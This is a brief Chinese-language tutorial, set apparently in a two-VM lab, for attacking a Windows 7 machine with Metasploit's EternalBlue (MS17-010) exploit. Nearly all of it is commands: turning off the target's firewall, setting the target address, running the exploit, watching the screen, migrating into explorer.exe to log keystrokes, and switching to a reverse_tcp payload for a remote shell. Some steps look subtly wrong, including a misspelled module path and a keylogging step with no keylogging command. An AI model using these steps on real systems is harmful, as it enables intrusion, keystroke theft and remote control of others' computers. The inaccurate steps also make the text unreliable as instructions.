仅在两台虚拟机中(kali,win7->靶机),使用MSF工具
1.关闭虚拟机win7系统的防火墙
2.打开kali的终端,安装MSF相关框架:
apt install Metasploit-framework
3.初始化MSF:
msfdb init
4.启动MSF专用数据库:
service postgresql start
5.启动MSF:
msfconsole
6.查找永恒之蓝模块:
search ms17-010
7.选择使用的模块:
use exploit/windows/smb/ms17_010_eternablue
(检查RHOSTS,由于刚选择这个模块,所以他的RHOSTS的值是空的)
8.回到win7系统中,打开命令提示符,键入
ipconfig
查看IP地址(192.168.177.131)
9.给RHOSTS设置参数并检查:
set rhosts 192.168.177.131
(检查RHOSTS的值是否设置成功:show options)
10.RHOSTS参数设置成功后,键入:run开始,成功后显示meterpreter > ,这时候在其后键入screenshare监视win7屏幕
11.回到终端MSF界面,这时界面显示:meterpreter > ,继续键入:ps查看win7后台,记住explorer.exe的PID(1752)接着键入:migrate 1752开始键盘记录【完成后可按Ctrl+c结束记录,结束后会生产一个记录文件的路径,后续可使用终端root权限打开查看】
12.若想进入win7命令行界面,键入:exit退出该模式,此时界面显示:msf6 exploit(windows/smb/ms17_010_eternablue) > ,然后键入:set payload windows/x64/shell/reverse_tcp以修改payload参数,此时键入run,等待片刻即可成功进入win7的shell界面【win7的shell界面可能有乱码,键入chcp 65001即可更改】